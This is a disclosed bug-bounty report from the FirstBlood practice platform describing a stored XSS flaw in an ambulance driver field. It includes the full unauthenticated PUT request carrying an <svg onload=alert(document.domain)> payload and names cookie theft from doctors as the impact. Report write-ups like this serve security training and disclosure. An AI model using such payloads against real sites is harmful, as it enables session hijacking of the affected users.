FirstBlood-#1552 — Stored XSS in ambulance driver
This issue was discovered on FirstBlood v3
On 2022-12-11, pichik Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi,
DESCRIPTION:
Found that driver in ambulance is vulnerable to XSS.
As /api/manageambulances.php endpoint is publicly editable attacker can use this to insert XSS in them.
There is no filtering in place so payload is simple as: <svg onload=alert(document.domain)>
Here is POST request:
PUT /api/manageambulances.php HTTP/1.1
Host: 63c0f77f87b7-pichik.a.firstbloodhackers.com
Content-Length: 138
{
"driver":"<svg onload=alert(document.domain)>",
"number":"1337",
"ambId":"1e69d88d-08f9-4429-890c-bd11d4bd3e09",
"doctorPhoto":""
}
XSS is triggered when user visit his appointment with affected ambulance.
ID of ambulance is possible to get from /api/ambulances.php?select=all, which I reported before
POC SCREEN:
I used <body onload=''> for this demonstration.
IMPACT:
Attacker can chain more vulnerabilities to insret XSS to ambulance drivers and steal cookies of doctors.
REMEDIATION:
Apply html encoding for all user inputs
P2 High
Endpoint: /api/manageambulances.php
Parameter: driver
Payload: <svg onload=alert(document.domain)>
FirstBlood ID: 76
Vulnerability Type: Stored XSS
There is a stored XSS vulnerability on /ambulances.php via a malicious drivers name
FirstBlood ID: 73
Vulnerability Type: Stored XSS
The endpoint /api/manageambulances.php will respond to an unauthenticated PUT request which allows an attacker to modify the information